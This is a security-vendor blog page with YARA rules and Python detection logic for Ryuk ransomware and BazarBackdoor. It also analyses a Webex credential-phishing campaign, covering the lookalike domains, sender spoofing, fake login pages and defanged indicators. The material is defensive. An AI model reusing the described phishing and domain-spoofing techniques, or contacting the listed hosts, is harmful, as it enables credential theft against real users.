Register now for our live 30-minute briefing on Ryuk Ransomware & What You Need to Know on Thursday, November 12 at 11:00 am EST. Listen in as our Cofense Intelligence team provides the latest insights on this threat and learn how you can protect your organization.


Yara Rules for Campaign Detection 

Rule 1: 

rule PM_Intel_Ryuk_Payload_1029201 {
  meta:
    description = "EDR rule for detecting Ryuk ransomware main payload"
  strings:
    $ = ".RYK" wide nocase
    $ = "RyukReadMe.html" wide nocase
    $ = "UNIQUE_ID_DO_NOT_REMOVE" wide nocase
    $ = "\\users\\Public\\finish" wide nocase
    $ = "\\users\\Public\\sys" wide nocase
    $ = "\\Documents and Settings\\Default User\\finish" wide nocase
    $ = "\\Documents and Settings\\Default User\\sys" wide nocase
  condition:
    uint16(0) == 0x5a4d and uint32(uint32(0x3c)) == 0x00004550 and all of them
}
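Rule 1's condition has three parts: an MZ signature at offset 0, a PE signature at the offset stored in e_lfanew (offset 0x3c), and all seven strings present as UTF-16LE, matched case-insensitively. As an added example (not from the original post or the rule's author), this Python reimplements that condition so its logic can be checked against a constructed sample; the sample blob and helper names are constructed for illustration.

```python
import re
import struct

# The seven strings of Rule 1 (PM_Intel_Ryuk_Payload_1029201). YARA matches them
# "wide nocase": UTF-16LE encoded and case-insensitive, and all must be present.
RYUK_STRINGS = [
    ".RYK",
    "RyukReadMe.html",
    "UNIQUE_ID_DO_NOT_REMOVE",
    "\\users\\Public\\finish",
    "\\users\\Public\\sys",
    "\\Documents and Settings\\Default User\\finish",
    "\\Documents and Settings\\Default User\\sys",
]


def wide_nocase_pattern(text: str) -> re.Pattern:
    """Bytes regex equivalent to YARA `wide nocase` for an ASCII string: each
    character becomes [xX] followed by the 0x00 high byte of its UTF-16LE unit."""
    parts = []
    for ch in text:
        if ch.isalpha():
            parts.append(b"[" + ch.lower().encode() + ch.upper().encode() + b"]")
        else:
            parts.append(re.escape(ch.encode()))
        parts.append(b"\x00")
    return re.compile(b"".join(parts))


def is_pe(data: bytes) -> bool:
    """uint16(0) == 0x5a4d ("MZ") and uint32(uint32(0x3c)) == 0x00004550 ("PE\\0\\0")."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def matches_ryuk_rule(data: bytes) -> bool:
    """Rule 1's condition: a PE image that contains every string as wide nocase."""
    return is_pe(data) and all(wide_nocase_pattern(s).search(data) for s in RYUK_STRINGS)


def build_sample(strings, pe: bool = True) -> bytes:
    """Construct a minimal PE-shaped blob for testing; it is not a runnable executable."""
    header = bytearray(0x40)
    if pe:
        header[:2] = b"MZ"
        struct.pack_into("<I", header, 0x3C, 0x40)  # e_lfanew points just past the header
    body = b"PE\x00\x00" + b"\x00" * 20
    payload = b"".join(s.encode("utf-16-le") + b"\x00\x00" for s in strings)
    return bytes(header) + body + payload
```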

Rule 2:¹ 

rule crime_win64_backdoor_bazarbackdoor1 {
  meta:
    description = "Detects BazarBackdoor injected 64-bit malware"
    author = "@VK_Intel"
    reference = "https://twitter.com/pancak3lullz/status/1252303608747565057"
    tlp = "white"
    date = "2020-04-24"
  strings:
    $str1 = "%id%"
    $str2 = "%d"
    $start = { 48 ?? ?? ?? ?? 57 48 83 ec 30 b9 01 00 00 00 e8 ?? ?? ?? ?? 84 c0 0f ?? ?? ?? ?? ?? 40 32 ff 40 ?? ?? ?? ?? e8 ?? ?? ?? ?? 8a d8 8b ?? ?? ?? ?? ?? 83 f9 01 0f ?? ?? ?? ?? ?? 85 c9 75 ?? c7 ?? ?? ?? ?? ?? ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? e8 ?? ?? ?? ?? 85 c0 74 ?? b8 ff 00 00 00 e9 ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? e8 ?? ?? ?? ?? c7 ?? ?? ?? ?? ?? ?? ?? ?? ?? eb ?? 40 b7 01 40 ?? ?? ?? ?? 8a cb e8 ?? ?? ?? ?? e8 ?? ?? ?? ?? 48 8b d8 48 ?? ?? ?? 74 ?? }
    $server = { 40 53 48 83 ec 20 48 8b d9 e8 ?? ?? ?? ?? 85 c0 75 ?? 0f ?? ?? ?? ?? ?? ?? 66 83 f8 50 74 ?? b9 bb 01 00 00 66 3b c1 74 ?? a8 01 74 ?? 48 8b cb e8 ?? ?? ?? ?? 84 c0 75 ?? 48 8b cb e8 ?? ?? ?? ?? b8 f6 ff ff ff eb ?? 33 c0 48 83 c4 20 5b c3 }
  condition:
    ( uint16(0) == 0x5a4d and ( 3 of them ) ) or ( all of them )
}

¹Sourced from https://twitter.com/VK_Intel/status/1315663046694625286 and evaluated by Cofense Intelligence analysts. 

All third-party trademarks referenced by Cofense whether in logo form, name form or product form, or otherwise, remain the property of their respective holders, and use of these trademarks in no way indicates any relationship between Cofense and the holders of the trademarks. Any observations contained in this blog regarding circumvention of end point protections are based on observations at a point in time based on a specific set of system configurations. Subsequent updates or different configurations may be effective at stopping these or similar threats.  
  
The Cofense® and PhishMe® names and logos, as well as any other Cofense product or service names or logos displayed on this blog are registered trademarks or trademarks of Cofense Inc.

Online Leader Invites You to This Webex Phish

By Ashley Tran, Cofense Phishing Defense Center

The Cofense Phishing Defense Center (PDC) team has identified a phishing campaign that attempts to harvest Webex credentials. This is not the first active Webex campaign we have seen, as we have noted before; it is an attack method that became increasingly common as non-essential workers were pushed into remote work by the pandemic. The previous Webex phish relied on claims of Webex vulnerabilities and SSL certificate fixes, but this one takes a more subtle approach: posing as a Webex event invite.

Figure 1: Email Body 

The email shown in Figure 1 looks, at a glance, like the kind of normal Webex event invite any Webex user is accustomed to. It says the user has been invited to the event “Leadership&Muscles,” hosted by “Online Leader.” Although vague, the mentions of “Leadership” and “Online Leader” may lead most users to assume it is work related, and without the typical phishing language urging them to join, many may not feel threatened and may opt to join the meeting out of curiosity.

Should a user think to hover over the “join a meeting” button, the URL shown in the preview is: hxxp://idbrokerwebex[.]com

Despite the threat actor’s attempts to make this email seem legitimate, the subject already looks off compared to the body – a Portuguese subject paired with an English body? If that does not reveal the true nature of this email, the threat actor’s carelessness with the From and Sender fields will. Although there was an obvious attempt to make the email appear to come from Webex by including “[email protected],” the real sender address is right next to it: americacentral02[@]eliteddi[.]com.

Looking into the domain eliteddi.com, we can see that it was recently registered, as seen in Figure 2.  

Figure 2: Domain Registration Information for eliteddi.com 

This was perhaps done to give the threat actor a domain of their own to send from. Sending from a domain they control gives the threat actor legitimate DKIM, SPF and DMARC results, which helps the email get past authentication-based filtering. The domain was presumably also used as practice while setting up this attack because, as shown in Figure 3, it also hosts the same Webex phish. Since eliteddi[.]com is not part of the email a user would typically interact with, it can be assumed that this domain was part of the threat actor’s practice run before launching the attack.

Figure 3: Webex phish found on the sender domain eliteddi[.]com  

Turning to the URL embedded in the email itself, it looks much more legitimate than the one seen in the threat actor’s practice attempt. This fraudulent domain was also recently registered, according to its WHOIS record, as seen in Figure 4.

Figure 4: Domain information for idbrokerwebex[.]com 

One thing to note about this fraudulent domain is that the threat actor has tried to mimic a real Webex URL, one that is typically just a quick redirect when logging into Webex Teams but would still be a familiar site to users. The only difference between the legitimate and phishing URLs is the “.” separating idbroker from webex – a small typo by a user trying to reach the real domain could lead to a huge mistake in this case.
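The three tells described in this post (a brand name in the display name while the real address belongs to another domain, SPF/DKIM passing only for that other domain, and a link host that equals the real login host once the dot is dropped) can be checked mechanically. The Python below is an added example, not the PDC's code; the sample message is constructed from the headers and link described above, and idbroker.webex.com is taken as the legitimate host the text contrasts the lookalike with.

```python
import re
from email import message_from_string
from email.policy import default
from urllib.parse import urlparse

# Brand being impersonated and the hosts its real login flow uses; the post
# contrasts idbroker.webex.com with a lookalike that simply drops the dot.
BRAND = "webex"
LEGIT_HOSTS = ("idbroker.webex.com", "webex.com")
URL_RE = re.compile(r"""https?://[^\s"'<>]+""", re.I)
AUTH_D_RE = re.compile(r"header\.d=([\w.-]+)", re.I)


def is_legit(host: str) -> bool:
    host = host.lower().rstrip(".")
    return any(host == h or host.endswith("." + h) for h in LEGIT_HOSTS)


def lookalike_of(host: str):
    """Legitimate host this one collapses to once dots are removed, or None.
    A genuine brand host or subdomain is never reported as a lookalike."""
    host = host.lower().rstrip(".")
    if is_legit(host):
        return None
    squashed = host.replace(".", "")
    return next((h for h in LEGIT_HOSTS if h.replace(".", "") == squashed), None)


def triage(raw: str) -> dict:
    """Check one message for the three tells described in the post."""
    msg = message_from_string(raw, policy=default)
    sender = msg["From"].addresses[0]
    real_domain = sender.addr_spec.rsplit("@", 1)[-1].lower()
    # 1. Brand in the display name while the real address is another domain.
    display_spoof = BRAND in sender.display_name.lower() and not is_legit(real_domain)
    # 2. SPF/DKIM "pass" only vouches for the domain the attacker registered.
    m = AUTH_D_RE.search(str(msg["Authentication-Results"] or ""))
    auth_domain = m.group(1).lower() if m else None
    auth_for_brand = bool(auth_domain) and is_legit(auth_domain)
    # 3. Links whose host is a dot-dropped lookalike of the real login host.
    body = msg.get_body(preferencelist=("plain", "html"))
    text = body.get_content() if body else ""
    lookalikes = [(u, lookalike_of(urlparse(u).hostname or "")) for u in URL_RE.findall(text)]
    lookalikes = [(u, h) for u, h in lookalikes if h]
    verdict = "impersonation" if (display_spoof or lookalikes) else "clean"
    return {"display_name_spoof": display_spoof, "authenticated_domain": auth_domain,
            "auth_for_brand": auth_for_brand, "lookalike_links": lookalikes, "verdict": verdict}


# Constructed sample modelled on the headers and link described in the post.
SAMPLE = """\
From: "Webex Messenger" <americacentral02@eliteddi.com>
Authentication-Results: mx.example.net; spf=pass smtp.mailfrom=eliteddi.com;
 dkim=pass header.d=eliteddi.com
Subject: Convite: Leadership&Muscles

Online Leader invites you to the Webex event Leadership&Muscles.
Join meeting: http://idbrokerwebex.com/
"""
```

A DKIM or SPF pass for eliteddi.com is reported separately from the verdict because it is true and yet proves nothing about Webex; authentication results identify the sending domain, not whether that domain is the one the display name claims.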

The phish itself can be noted in Figure 2.

Figure 5-6: Phishing Page 

Webex phish similar to this one have used the same template when harvesting credentials: essentially a perfect copy of Webex’s login page. This page has no noticeable grammar flaws or odd formatting anywhere. In fact, even the URL in the address bar does not immediately give anything away should a user glance at it for validation.

Compared to the phishing page hosted on the threat actor’s “practice” domain noted above, this one actually has a certificate for the site, which in turn adds a lock to the address bar that, to most users, indicates the site is “secure.” This is a relatively common addition, especially with website builders that provide creators a certificate to work with. However, as noted numerous times in other blogs, threat actors are using that perception to trick users into trusting their phishing attacks.

The second step of this attack is shown in Figures 7-8. It acts more as a distraction, since the page looks like any other Webex event registration page. Here the user fills in whatever fields are marked required, then moves on to the final confirmation page. While this page is most likely just an attempt to put to rest any suspicions the user had initially, it also has the potential to gather more information about the user.

Figure 7-8: “Event” Registration 

Indicators of Compromise 

Network IOC   IP   
hxxp://eliteddi[.]com  192.185.214.103 
hxxp://idbrokerwebex[.]com  216.172.161.34 